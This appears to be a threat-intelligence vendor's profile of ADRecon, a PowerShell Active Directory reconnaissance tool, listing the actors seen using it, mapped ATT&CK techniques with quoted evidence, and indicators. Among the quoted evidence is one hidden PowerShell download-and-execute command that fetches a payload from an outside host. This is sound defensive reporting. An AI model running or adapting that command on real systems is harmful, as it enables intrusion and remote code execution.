Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 3 actors

ADRecon

ADRecon is an open-source PowerShell-based Active Directory reconnaissance tool used to gather extensive information about AD environments. The provided content states it can enumerate data including ACLs, DNS zones, BitLocker recovery keys, LAPS passwords, domain accounts, and SPN credential hashes. It is referenced as ADRecon, ADRecon.ps1, and in some intrusions under renamed script names such as dra.ps1 and C:\osit\r.ps1. Observed usage includes reconnaissance of Active Directory environments by multiple threat actors and intrusion sets, including UNC3944 / Octo Tempest / Scattered Spider-related activity, VOID MANTICORE, and BlackCat (ALPHV) intrusions or affiliates. In the cited incidents, ADRecon was used after initial access and during post-compromise discovery to enumerate the domain, support privilege escalation toward Domain Admin, and enable broader lateral movement or destructive actions. It has been observed alongside other AD enumeration tools such as ADExplorer, SharpHound, PingCastle, and ADFind, and alongside credential theft and defense evasion activity such as LSASS dumping, registry hive export, Windows Defender disabling, and use of Mimikatz. High-confidence indicators from the content include the tool name ADRecon, the PowerShell script name ADRecon.ps1, and renamed executions such as dra.ps1 and C:\osit\r.ps1.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Scattered Spider

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

via mandiant threat intelligencecloud.google.com
BlackCat

The file was identified as ‘ADRecon’, an open-source PowerShell tool specifically designed to gather extensive information about Active Directory (AD) environments, including ACLs, DNS zones, BitLocker recovery keys, LAPS passwords, Domain accounts, and SPN credential hashes.

via sygniasygnia.co
Handala

VOID MANTICORE has utilized ADRecon to enumerate the active directory environment.

via mitre attack websiteattack.mitre.org
MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

1 technique
T1059.001PowerShellEvidence2

The attackers launched the Windows command interpreter... cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt'))

Stealth

1 technique
T1070.004File DeletionEvidence1

the threat actor uploaded the ‘netscan.exe’ file to the same folder, used it to scan the domain, and deleted it after the scan activity was completed... the file no longer existed after execution – presumably it was deleted by the threat actor.

Discovery

10 techniques
T1018Remote System DiscoveryEvidence6

Additional tradecraft and techniques: PingCastle and ADRecon to perform reconnaissance of Active Directory.

T1033System Owner/User DiscoveryEvidence1

Initial bulk-export of users, groups, and device information is closely followed by enumerating data and resources readily available to the user’s profile... AAD bulk downloads of user, groups, and devices.

T1046Network Service DiscoveryEvidence2

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

T1069Permission Groups DiscoveryEvidence1

Attackers query directories to extract sensitive information such as user accounts, group memberships and permissions... Some common types of LDAP enumeration that are important to monitor include: Admin enumeration: Queries targeting administrative accounts and privileges

T1069.002Domain GroupsEvidence1

Later, the threat actor utilized a user account to remotely deploy Cobalt Strike Beacon on a server in a third domain, followed by network scans and enumeration of the Admins group in the new domain.

T1082System Information DiscoveryEvidence1

Upon initial compromise, UNC3944 is known to search for documentation on topics such as: user provisioning, MFA and/or device registration, network diagrams, and shared credentials in documents or spreadsheets.

T1083File and Directory DiscoveryEvidence1

The threat actor leveraged the SoftPerfect tool to perform several manual reconnaissance activities, which included searching for passwords in Group Policy xml files, accessing remote folders via Windows Explorer...

T1087Account DiscoveryEvidence3

UNC3944 is known to search for documentation on topics such as: user provisioning, MFA and/or device registration...

T1087.002Domain AccountEvidence3

T1087.002 - Domain Account Description from ATT&CK. Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

T1482Domain Trust DiscoveryEvidence3

UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound.

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
hash.md5●●●●●●●●●●●●View more in app5 years ago
ACTIVITY FEED

Recent activity

7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

7 SOURCESView more in app
mitre attack websiteNews
Mar 20, 2026
VOID MANTICORE, COBALT MYSTIQUE, Handala Hack, Homeland Justice, Karma, Karmabelow80, BANISHED KITTEN, Red Sandstorm, Group G1055 | MITRE ATT&CK®

Active Directory reconnaissance tool used to enumerate the victim AD environment.

Read more
splunk researchNews
Mar 16, 2026
Analytics Story: Void Manticore | Splunk Security Content

Active Directory reconnaissance tool used to enumerate AD environments and support privilege escalation and destructive operations.

Read more
checkpoint research blogNews
Mar 12, 2026
“Handala Hack” - Unveiling Group's Modus Operandi - Check Point Research

PowerShell-based Active Directory reconnaissance framework used to enumerate domain information to support privilege escalation and follow-on destructive actions.

Read more
sygniaNews
Mar 5, 2024
The Anatomy of a BlackCat Ransomware (ALPHV) Attack

Active Directory reconnaissance framework used to enumerate sensitive AD configuration and credential-related data at scale.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping12

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.